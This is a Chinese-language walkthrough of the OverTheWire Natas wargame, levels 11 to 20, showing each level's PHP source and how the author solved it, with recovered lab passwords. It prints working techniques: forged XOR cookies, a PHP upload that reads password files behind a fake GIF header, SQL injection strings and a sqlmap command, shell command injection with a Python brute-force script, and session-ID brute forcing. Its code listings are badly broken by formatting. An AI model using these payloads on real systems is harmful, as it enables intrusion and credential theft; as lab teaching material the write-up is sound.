
接上一篇Natas通關指南(1-10) 繼續闖關

OverTheWire 是一個 wargame 網站。其中 Natas 是一個適合學習Web安全基礎的遊戲,在Natas 中,我們需要通過找到網站的漏洞獲得通往下一關的密碼。每一關都有一個網站,類似,其中X是每一關的編號。每一關都要輸入用戶名(例如,level0的用戶名是natas0)及其密碼才能訪問。所有密碼存儲在 /etc/natas_webpass/中。例如natas1的密碼存儲在文件 /etc/natas_webpass/natas1中,只能由natas0natas1讀取。



Level 11-12

Username: natas11

Password: natas11


首先使用我們之前得到的密碼: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK登錄natas11,得到一句提示:

  1. Cookies are protected with XOR encryption

還有一個可以設置背景顏色的輸入框,輸入16進制的色值,即可設置網頁背景顏色,同樣可以通過點擊 Viewsourcecode查看源碼。關鍵代碼如下:

  1. $defaultdata = array(
  2. "showpassword"
  3. =>
  4. "no"
  5. ,
  6. "bgcolor"
  7. =>
  8. "#ffffff"
  9. );
  10. function
  11. xor_encrypt($in) {
  12. $key =
  13. ''
  14. ;
  15. $text = $in;
  16. $outText =
  17. ''
  18. ;
  19. // Iterate through each character
  20. for
  21. ($i=
  22. 0
  23. ;$i
  24. $outText .= $text[$i] ^ $key[$i % strlen($key)];
  25. }
  26. return
  27. $outText;
  28. }
  29. function
  30. loadData($def) {
  31. global
  32. $_COOKIE;
  33. $mydata = $def;
  34. if
  35. (array_key_exists(
  36. "data"
  37. , $_COOKIE)) {
  38. $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[
  39. "data"
  40. ])),
  41. true
  42. );
  43. if
  44. (is_array($tempdata) && array_key_exists(
  45. "showpassword"
  46. , $tempdata) && array_key_exists(
  47. "bgcolor"
  48. , $tempdata)) {
  49. if
  50. (preg_match(
  51. '/^#(?:[a-f\d]{6})$/i'
  52. , $tempdata[
  53. 'bgcolor'
  54. ])) {
  55. $mydata[
  56. 'showpassword'
  57. ] = $tempdata[
  58. 'showpassword'
  59. ];
  60. $mydata[
  61. 'bgcolor'
  62. ] = $tempdata[
  63. 'bgcolor'
  64. ];
  65. }
  66. }
  67. }
  68. return
  69. $mydata;
  70. }
  71. function
  72. saveData($d) {
  73. setcookie(
  74. "data"
  75. , base64_encode(xor_encrypt(json_encode($d))));
  76. }
  77. $data = loadData($defaultdata);
  78. if
  79. (array_key_exists(
  80. "bgcolor"
  81. ,$_REQUEST)) {
  82. if
  83. (preg_match(
  84. '/^#(?:[a-f\d]{6})$/i'
  85. , $_REQUEST[
  86. 'bgcolor'
  87. ])) {
  88. $data[
  89. 'bgcolor'
  90. ] = $_REQUEST[
  91. 'bgcolor'
  92. ];
  93. }
  94. }
  95. saveData($data);
  96. ?>
  97. natas11
  98. "content"
  99. >
  100. "background: =$data['bgcolor']?>;"
  101. >
  102. Cookies
  103. are
  104. protected
  105. with
  106. XOR encryption

  107. if
  108. ($data[
  109. "showpassword"
  110. ] ==
  111. "yes"
  112. ) {
  113. print
  114. "The password for natas12 is
  115. ;
  116. }
  117. ?>
  118. 從代碼可以看出,通過一些列的編碼,包括 base64加密, php異或運算。把用戶輸入的數據編碼進 cookie裡面。通過瀏覽器可以查看到data這個值是: ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw。而 showpassword這個參數決定了我們是否能看到下一關密碼。代碼中有個 censored的 key,這個是 php用來做異或運算加密用到的 key,我們需要先算出這 key值,然後用這個值作為 key進行運算和一些列編碼,計算出新的 cookie傳入,即可得到下一關的密碼。


    1. $orig_cookie = base64_decode(
    2. 'ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw'
    3. );
    4. function
    5. xor_encrypt($in) {
    6. $text = $in;
    7. $key = json_encode(array(
    8. "showpassword"
    9. =>
    10. "no"
    11. ,
    12. "bgcolor"
    13. =>
    14. "#ffffff"
    15. ));
    16. $out =
    17. ''
    18. ;
    19. for
    20. ($i=
    21. 0
    22. ;$i
    23. $out .= $text[$i] ^ $key[$i % strlen($key)];
    24. }
    25. return
    26. $out;
    27. }
    28. echo xor_encrypt($orig_cookie);
    29. ?>

    得到的結果是 qw8J


    1. $defaultdata = array(
    2. "showpassword"
    3. =>
    4. "yes"
    5. ,
    6. "bgcolor"
    7. =>
    8. "#ffffff"
    9. );
    10. function
    11. xor_encrypt($in) {
    12. $key =
    13. 'qw8J'
    14. ;
    15. $text = $in;
    16. $out =
    17. ''
    18. ;
    19. // Iterate through each character
    20. for
    21. ($i=
    22. 0
    23. ;$i
    24. $out .= $text[$i] ^ $key[$i % strlen($key)];
    25. }
    26. return
    27. $out;
    28. }
    29. function
    30. loadData($def) {
    31. $mydata = $def;
    32. $tempdata = json_decode(xor_encrypt(base64_decode($data)),
    33. true
    34. );
    35. return
    36. $mydata;
    37. }
    38. echo base64_encode(xor_encrypt(json_encode(loadData($defaultdata))))
    39. ?>

    結果是: ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK,傳入新的Cookie:

    1. curl -isu natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK --cookie
    2. "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK"
    3. HTTP/
    4. 1.1
    5. 200
    6. OK
    7. Date
    8. :
    9. Mon
    10. ,
    11. 27
    12. Aug
    13. 2018
    14. 13
    15. :
    16. 40
    17. :
    18. 47
    19. GMT
    20. Server
    21. :
    22. Apache
    23. /
    24. 2.4
    25. .
    26. 10
    27. (
    28. Debian
    29. )
    30. Set
    31. -
    32. Cookie
    33. : data=
    35. ......
    36. Cookies
    37. are
    38. protected
    39. with
    40. XOR encryption

    41. The
    42. password
    43. for
    44. natas12
    45. is
    46. EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

    47. ......


    Level 12-13

    Username: natas12



    1. Choose a JPEG to upload (max 1KB):

    提示可以上傳圖片,最大不超過1kB,點擊 Viewsourcecode查看源碼,關鍵代碼如下:

    1. function
    2. genRandomString() {
    3. $length =
    4. 10
    5. ;
    6. $characters =
    7. "0123456789abcdefghijklmnopqrstuvwxyz"
    8. ;
    9. $string =
    10. ""
    11. ;
    12. for
    13. ($p =
    14. 0
    15. ; $p < $length; $p++) {
    16. $string .= $characters[mt_rand(
    17. 0
    18. , strlen($characters)-
    19. 1
    20. )];
    21. }
    22. return
    23. $string;
    24. }
    25. function
    26. makeRandomPath($dir, $ext) {
    27. do
    28. {
    29. $path = $dir.
    30. "/"
    31. .genRandomString().
    32. "."
    33. .$ext;
    34. }
    35. while
    36. (file_exists($path));
    37. return
    38. $path;
    39. }
    40. function
    41. makeRandomPathFromFilename($dir, $fn) {
    42. $ext = pathinfo($fn, PATHINFO_EXTENSION);
    43. return
    44. makeRandomPath($dir, $ext);
    45. }
    46. if
    47. (array_key_exists(
    48. "filename"
    49. , $_POST)) {
    50. $target_path = makeRandomPathFromFilename(
    51. "upload"
    52. , $_POST[
    53. "filename"
    54. ]);
    55. if
    56. (filesize($_FILES[
    57. 'uploadedfile'
    58. ][
    59. 'tmp_name'
    60. ]) >
    61. 1000
    62. ) {
    63. echo
    64. "File is too big"
    65. ;
    66. }
    67. else
    68. {
    69. if
    70. (move_uploaded_file($_FILES[
    71. 'uploadedfile'
    72. ][
    73. 'tmp_name'
    74. ], $target_path)) {
    75. echo
    76. "The file has been uploaded"
    77. ;
    78. }
    79. else
    80. {
    81. echo
    82. "There was an error uploading the file, please try again!"
    83. ;
    84. }
    85. }
    86. }
    87. else
    88. {
    89. ?>
    90. enctype
    91. =
    92. "multipart/form-data"
    93. action
    94. =
    95. "index.php"
    96. method
    97. =
    98. "POST"
    99. >
    100. type
    101. =
    102. "hidden"
    103. name
    104. =
    105. "MAX_FILE_SIZE"
    106. value
    107. =
    108. "1000"
    109. />
    110. Choose a JPEG to upload (max 1KB):

    111. name
    112. =
    113. "uploadedfile"
    114. type
    115. =
    116. "file"
    117. />
    118. />
    119. type
    120. =
    121. "submit"
    122. value
    123. =
    124. "Upload File"
    125. />

    通過閱讀代碼,可以發現除了限制文件大小和文件擴展名做了前端限制之外,並沒有檢測文件類型。而且還會返回上傳後的路徑,那我們直接上傳一個 php文件去讀取 natas13的密碼即可。你可以通過 BurpSuite之類的工具修改上傳的 filename後綴即可。

    1. ///getpass.php
    2. $getpass = file_get_contents(
    3. '/etc/natas_webpass/natas13'
    4. );
    5. echo $getpass;
    6. ?>

    得到密碼: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

    Level 13-14

    Username: natas13


    頁面和前一關一樣,不過查看源代碼發現這一次限制了文件類型,通過 php的函數 exif_imagetype() 來驗證文件類型,通過查看php的文檔,這個函數通過檢查文件的簽名(第一個字節),從而檢測文件類型。關鍵代碼如下:

    1. }
    2. else
    3. if
    4. (! exif_imagetype($_FILES[
    5. 'uploadedfile'
    6. ][
    7. 'tmp_name'
    8. ])) {
    9. echo
    10. "File is not an image"
    11. ;
    12. }
    13. else
    14. {
    15. if
    16. (move_uploaded_file($_FILES[
    17. 'uploadedfile'
    18. ][
    19. 'tmp_name'
    20. ], $target_path)) {
    21. echo
    22. "The file has been uploaded"
    23. ;
    24. }
    25. else
    26. {
    27. echo
    28. "There was an error uploading the file, please try again!"
    29. ;
    30. }
    31. }
    32. }
    33. else
    34. {

    那我們只需在上傳的 php文件中加入任意圖片格式文件頭標識即可,比如 GIF98a

    1. GIF89a
    2. $getpass = file_get_contents(
    3. '/etc/natas_webpass/natas14'
    4. );
    5. echo $getpass;
    6. ?>

    上傳後訪問返回的路徑,得到密碼: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

    Level 14-15

    Username: natas14


    訪問後,是一個登錄頁面,需要輸入 username和 password,查看代碼,關鍵代碼:

    1. if
    2. (array_key_exists(
    3. "username"
    4. , $_REQUEST)) {
    5. $link = mysql_connect(
    6. 'localhost'
    7. ,
    8. 'natas14'
    9. ,
    10. ''
    11. );
    12. mysql_select_db(
    13. 'natas14'
    14. , $link);
    15. $query =
    16. "SELECT * from users where username=""
    17. .$_REQUEST[
    18. "username"
    19. ].
    20. "" and password=""
    21. .$_REQUEST[
    22. "password"
    23. ].
    24. """
    25. ;
    26. if
    27. (array_key_exists(
    28. "debug"
    29. , $_GET)) {
    30. echo
    31. "Executing query: $query
    32. ;
    33. }
    34. if
    35. (mysql_num_rows(mysql_query($query, $link)) >
    36. 0
    37. ) {
    38. echo
    39. "Successful login! The password for natas15 is
    40. ;
    41. }
    42. else
    43. {
    44. echo
    45. "Access denied!
    46. ;
    47. }
    48. mysql_close($link);
    49. }
    50. else
    51. {
    52. ?>

    很明顯的 SQL注入漏洞,沒有任何過濾,直接試試萬能密碼: " OR 1=1 #

    注入成功,得到密碼: Successfullogin!Thepasswordfornatas15isAwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

    Level 15-16

    Username: natas15


    頁面需要輸入一個 username,可以點擊 Checkexistence查詢用戶是否存在,關鍵代碼如下:

    1. natas15
    2. id
    3. =
    4. "content"
    5. >
    6. /*
    7. CREATE TABLE `users` (
    8. `username` varchar(64) DEFAULT NULL,
    9. `password` varchar(64) DEFAULT NULL
    10. );
    11. */
    12. if
    13. (array_key_exists(
    14. "username"
    15. , $_REQUEST)) {
    16. $link = mysql_connect(
    17. 'localhost'
    18. ,
    19. 'natas15'
    20. ,
    21. ''
    22. );
    23. mysql_select_db(
    24. 'natas15'
    25. , $link);
    26. $query =
    27. "SELECT * from users where username=""
    28. .$_REQUEST[
    29. "username"
    30. ].
    31. """
    32. ;
    33. if
    34. (array_key_exists(
    35. "debug"
    36. , $_GET)) {
    37. echo
    38. "Executing query: $query
    39. ;
    40. }
    41. $res = mysql_query($query, $link);
    42. if
    43. ($res) {
    44. if
    45. (mysql_num_rows($res) >
    46. 0
    47. ) {
    48. echo
    49. "This user exists.
    50. ;
    51. }
    52. else
    53. {
    54. echo
    55. "This user doesn't exist.
    56. ;
    57. }
    58. }
    59. else
    60. {
    61. echo
    62. "Error in query.
    63. ;
    64. }
    65. mysql_close($link);
    66. }
    67. else
    68. {
    69. ?>
    70. 這一關,頁面不會返回SQL結果。但可以通過錯誤提示判斷查詢的結果,所以可以使用SQL盲注,可以使用 LIKE表達式用通配符按個判斷。這裡我們直接用 sqlmap好了。

      1. sqlmap -u http:
      2. // --auth-type=basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --dbms=mysql --data username=natas16 --level=5 --risk=3 --technique=B --dump --string="This user exists"

      或者寫python腳本獲取密碼,得到密碼 WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

      Level 16-17

      Username: natas16



      頁面提示 Forsecurity reasons,we now filter even more on certain characters,頁面功能是 Findwords containing:,需要輸入一些內容,然後搜索,然後會輸出一些內容。關鍵代碼如下:

      1. $key =
      2. ""
      3. ;
      4. if
      5. (array_key_exists(
      6. "needle"
      7. , $_REQUEST)) {
      8. $key = $_REQUEST[
      9. "needle"
      10. ];
      11. }
      12. if
      13. ($key !=
      14. ""
      15. ) {
      16. if
      17. (preg_match(
      18. '/[;|&`\'"]/'
      19. ,$key)) {
      20. print
      21. "Input contains an illegal character!"
      22. ;
      23. }
      24. else
      25. {
      26. passthru(
      27. "grep -i "$key" dictionary.txt"
      28. );
      29. }
      30. }
      31. ?>

      雖然過濾了很多字符,但是沒有過濾 $和 ()。我們知道PHP裡的 $()即使在引號內也可以使用,所以我們可以構造注入語言 $(grep a/etc/natas_webpass/natas17),執行的語句是這樣的: passthru("grep -i "$(grep a /etc/natas_webpass/natas17)" dictionary.txt");所有的單詞都被返回了。 我們知道 dictionary.txt中存在字符串,比如說 A,用它與 $(grep)的返回值相加,如果內層返回了結果將檢索出空值,如果返回空值則外層的 grep會返回結果 。

      比如說:如 password中首字母為 a,構成

      grep-I"$(grep ^a /etc/natas_webpass/natas17)A"dictionary.txt由於內部的 $()命令返回了 a,則使外層命令變為

      grep-I"aA"dictionary.txt由於 dictionary中沒有 aA,從而返回空值

      而如果內層 $()命令返回空值,外層則能正確檢索到 A,於是返回值,證明首字母不是 a


      1. import
      2. requests
      3. chars =
      4. '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
      5. exist =
      6. ''
      7. password =
      8. ''
      9. target =
      10. 'http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh*'
      11. trueStr =
      12. 'Output:\n
      13. for
      14. x
      15. in
      16. chars:
      17. r = requests.get(target+
      18. '?needle=$(grep '
      19. +x+
      20. ' /etc/natas_webpass/natas17)Getpass'
      21. )
      22. if
      23. r.content.find(trueStr) != -
      24. 1
      25. :
      26. exist += x
      27. print
      28. 'Using: '
      29. + exist
      30. for
      31. i
      32. in
      33. range(
      34. 32
      35. ):
      36. for
      37. c
      38. in
      39. exist:
      40. r = requests.get(target+
      41. '?needle=$(grep ^'
      42. +password+c+
      43. ' /etc/natas_webpass/natas17)Getpass'
      44. )
      45. if
      46. r.content.find(trueStr) != -
      47. 1
      48. :
      49. password += c
      50. print
      51. 'Password: '
      52. + password +
      53. '*'
      54. * int(
      55. 32
      56. - len(password))
      57. break

      得到密碼是: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

      Level 17-18

      Username: natas17


      同 natas15,不過沒有錯誤提示,所以可以用基於時間的盲注。

      得出的密碼是 xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

      Level 18-19

      Username: natas18


      提示: Pleaseloginwithyour admin account to retrieve credentialsfornatas19.

      同樣有一個登錄框,可以輸入 username和 password。關鍵代碼如下:

      1. $maxid =
      2. 640
      3. ;
      4. // 640 should be enough for everyone
      5. function
      6. isValidAdminLogin() {
      7. /* {{{ */
      8. if
      9. ($_REQUEST[
      10. "username"
      11. ] ==
      12. "admin"
      13. ) {
      14. /* This method of authentication appears to be unsafe and has been disabled for now. */
      15. //return 1;
      16. }
      17. return
      18. 0
      19. ;
      20. }
      21. /* }}} */
      22. function
      23. isValidID($id) {
      24. /* {{{ */
      25. return
      26. is_numeric($id);
      27. }
      28. /* }}} */
      29. function
      30. createID($user) {
      31. /* {{{ */
      32. global
      33. $maxid;
      34. return
      35. rand(
      36. 1
      37. , $maxid);
      38. }
      39. /* }}} */
      40. function
      41. debug($msg) {
      42. /* {{{ */
      43. if
      44. (array_key_exists(
      45. "debug"
      46. , $_GET)) {
      47. print
      48. "DEBUG: $msg
      49. ;
      50. }
      51. }
      52. /* }}} */
      53. function
      54. my_session_start() {
      55. /* {{{ */
      56. if
      57. (array_key_exists(
      58. "PHPSESSID"
      59. , $_COOKIE)
      60. and
      61. isValidID($_COOKIE[
      62. "PHPSESSID"
      63. ])) {
      64. if
      65. (!session_start()) {
      66. debug(
      67. "Session start failed"
      68. );
      69. return
      70. false
      71. ;
      72. }
      73. else
      74. {
      75. debug(
      76. "Session start ok"
      77. );
      78. if
      79. (!array_key_exists(
      80. "admin"
      81. , $_SESSION)) {
      82. debug(
      83. "Session was old: admin flag set"
      84. );
      85. $_SESSION[
      86. "admin"
      87. ] =
      88. 0
      89. ;
      90. // backwards compatible, secure
      91. }
      92. return
      93. true
      94. ;
      95. }
      96. }
      97. return
      98. false
      99. ;
      100. }
      101. /* }}} */
      102. function
      103. print_credentials() {
      104. /* {{{ */
      105. if
      106. ($_SESSION
      107. and
      108. array_key_exists(
      109. "admin"
      110. , $_SESSION)
      111. and
      112. $_SESSION[
      113. "admin"
      114. ] ==
      115. 1
      116. ) {
      117. print
      118. "You are an admin. The credentials for the next level are:
      119. ;
      120. print
      121. "
        Username: natas19\n"
      122. ;
      123. print
      124. "Password: "
      125. ;
      126. }
      127. else
      128. {
      129. print
      130. "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19."
      131. ;
      132. }
      133. }
      134. /* }}} */
      135. $showform =
      136. true
      137. ;
      138. if
      139. (my_session_start()) {
      140. print_credentials();
      141. $showform =
      142. false
      143. ;
      144. }
      145. else
      146. {
      147. if
      148. (array_key_exists(
      149. "username"
      150. , $_REQUEST) && array_key_exists(
      151. "password"
      152. , $_REQUEST)) {
      153. session_id(createID($_REQUEST[
      154. "username"
      155. ]));
      156. session_start();
      157. $_SESSION[
      158. "admin"
      159. ] = isValidAdminLogin();
      160. debug(
      161. "New session started"
      162. );
      163. $showform =
      164. false
      165. ;
      166. print_credentials();
      167. }
      168. }
      169. if
      170. ($showform) {
      171. ?>

      從代碼上來看,沒有連接數據庫,說明不是 sql注入,但是我們注意到有一個變量 maxid,在 createID函數中,接收用戶名請求,並將其分配給 1到 640($maxid)之間的隨機整數。然後它將其初始化為 session_id。假設 PHPSESSID是來自 session_id的賦值,意味有1個會話ID分配會分配給“admin”。通過瀏覽器請求,我們發現 PHPSESSID的值確實是來自變量 maxid產生的 session_id值。

      所以我們只要窮舉 maxid的值就好了。可以用 Burpsuite爆破這個值,然後把它作為 PHPSESSID發送請求,即可得到密碼。密碼為 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

      如果嫌 Burpsuite太麻煩,用 shell腳本也可輕鬆搞定

      1. for
      2. i
      3. in
      4. `seq 640`
      5. do
      6. echo $i
      7. curl -isu natas18:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP http:
      8. // --cookie "PHPSESSID=$i" | grep natas19
      9. done

      Level 19-20

      Username: natas19


      提示是這樣的: Thispage uses mostly the same codeasthe previous level,but sessionIDsarenolonger sequential...Pleaseloginwithyour admin account to retrieve credentialsfornatas20.意思就是和上一關一樣,只不過 PHPSESSID不再那麼簡單容易猜到而已。

      通過觀察,發現其 PHPSESSID,雖然一長串字符串,如 3237362d61646d696e,通過16進制解碼發現,都是由 3位數字-admin組成的,也就是說後面的 2d61646d696e是不變的。所以我們只需要窮舉 1-640之間的數字然後拼接 -admin做16進制轉換,再帶入 PHPSESSID中進行提交,就能找到那個屬於 admin的 PHPSESSID。最後得到的密碼是 eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

      Level 20-21

      Username: natas20


      登錄後,提示: Youare loggedinasa regular user.Loginasan admin to retrieve credentialsfornatas21. 你可以輸入 Yourname,然後點 Changename,不過無論你輸入什麼頁面都沒有任何信息反饋給你。查看源碼,關鍵代碼如下:

      1. function
      2. debug($msg) {
      3. /* {{{ */
      4. if
      5. (array_key_exists(
      6. "debug"
      7. , $_GET)) {
      8. print
      9. "DEBUG: $msg
      10. ;
      11. }
      12. }
      13. /* }}} */
      14. function
      15. print_credentials() {
      16. /* {{{ */
      17. if
      18. ($_SESSION
      19. and
      20. array_key_exists(
      21. "admin"
      22. , $_SESSION)
      23. and
      24. $_SESSION[
      25. "admin"
      26. ] ==
      27. 1
      28. ) {
      29. print
      30. "You are an admin. The credentials for the next level are:
      31. ;
      32. print
      33. "
        Username: natas21\n"
      34. ;
      35. print
      36. "Password: "
      37. ;
      38. }
      39. else
      40. {
      41. print
      42. "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21."
      43. ;
      44. }
      45. }
      46. /* }}} */
      47. /* we don't need this */
      48. function
      49. myopen($path, $name) {
      50. //debug("MYOPEN $path $name");
      51. return
      52. true
      53. ;
      54. }
      55. /* we don't need this */
      56. function
      57. myclose() {
      58. //debug("MYCLOSE");
      59. return
      60. true
      61. ;
      62. }
      63. function
      64. myread($sid) {
      65. debug(
      66. "MYREAD $sid"
      67. );
      68. if
      69. (strspn($sid,
      70. "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-"
      71. ) != strlen($sid)) {
      72. debug(
      73. "Invalid SID"
      74. );
      75. return
      76. ""
      77. ;
      78. }
      79. $filename = session_save_path() .
      80. "/"
      81. .
      82. "mysess_"
      83. . $sid;
      84. if
      85. (!file_exists($filename)) {
      86. debug(
      87. "Session file doesn't exist"
      88. );
      89. return
      90. ""
      91. ;
      92. }
      93. debug(
      94. "Reading from "
      95. . $filename);
      96. $data = file_get_contents($filename);
      97. $_SESSION = array();
      98. foreach
      99. (explode(
      100. "\n"
      101. , $data)
      102. as
      103. $line) {
      104. debug(
      105. "Read [$line]"
      106. );
      107. $parts = explode(
      108. " "
      109. , $line,
      110. 2
      111. );
      112. if
      113. ($parts[
      114. 0
      115. ] !=
      116. ""
      117. ) $_SESSION[$parts[
      118. 0
      119. ]] = $parts[
      120. 1
      121. ];
      122. }
      123. return
      124. session_encode();
      125. }
      126. function
      127. mywrite($sid, $data) {
      128. // $data contains the serialized version of $_SESSION
      129. // but our encoding is better
      130. debug(
      131. "MYWRITE $sid $data"
      132. );
      133. // make sure the sid is alnum only!!
      134. if
      135. (strspn($sid,
      136. "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-"
      137. ) != strlen($sid)) {
      138. debug(
      139. "Invalid SID"
      140. );
      141. return
      142. ;
      143. }
      144. $filename = session_save_path() .
      145. "/"
      146. .
      147. "mysess_"
      148. . $sid;
      149. $data =
      150. ""
      151. ;
      152. debug(
      153. "Saving in "
      154. . $filename);
      155. ksort($_SESSION);
      156. foreach
      157. ($_SESSION
      158. as
      159. $key => $value) {
      160. debug(
      161. "$key => $value"
      162. );
      163. $data .=
      164. "$key $value\n"
      165. ;
      166. }
      167. file_put_contents($filename, $data);
      168. chmod($filename,
      169. 0600
      170. );
      171. }
      172. /* we don't need this */
      173. function
      174. mydestroy($sid) {
      175. //debug("MYDESTROY $sid");
      176. return
      177. true
      178. ;
      179. }
      180. /* we don't need this */
      181. function
      182. mygarbage($t) {
      183. //debug("MYGARBAGE $t");
      184. return
      185. true
      186. ;
      187. }
      188. session_set_save_handler(
      189. "myopen"
      190. ,
      191. "myclose"
      192. ,
      193. "myread"
      194. ,
      195. "mywrite"
      196. ,
      197. "mydestroy"
      198. ,
      199. "mygarbage"
      200. );
      201. session_start();
      202. if
      203. (array_key_exists(
      204. "name"
      205. , $_REQUEST)) {
      206. $_SESSION[
      207. "name"
      208. ] = $_REQUEST[
      209. "name"
      210. ];
      211. debug(
      212. "Name set to "
      213. . $_REQUEST[
      214. "name"
      215. ]);
      216. }
      217. print_credentials();
      218. $name =
      219. ""
      220. ;
      221. if
      222. (array_key_exists(
      223. "name"
      224. , $_SESSION)) {
      225. $name = $_SESSION[
      226. "name"
      227. ];
      228. }
      229. ?>


      debug($msg)表示打開了調試信息,可以通過在URL的末尾添加 /index.php?debug來查看調試消息 $msg。


      1. DEBUG: MYWRITE sm2d78a9d3u7r6qq2dn8tl7sf1 name|s:5:"admin";
      2. DEBUG: Saving in /var/lib/php5/sessions//mysess_sm2d78a9d3u7r6qq2dn8tl7sf1
      3. DEBUG: name => admin

      可以看出,登錄之後, $ _SESSION的值被存儲在一個文件中。

      重點在 mywrite和 myread這兩個關鍵函數,它們的作用是管理會話狀態。

      默認情況下, $ _SESSION中唯一的 key是 name,其值通過 /index.php中的表單提交進行設置。我們可以通過對 name鍵值對進行注入:將 data裡面的值變為: name xxxx \n admin1\n。



      再次訪問 http://natas20.natas.labs.overthewire.org即可得到密碼

      1. You are an admin. The credentials for the next level are:
      2. Username: natas21
      3. Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ



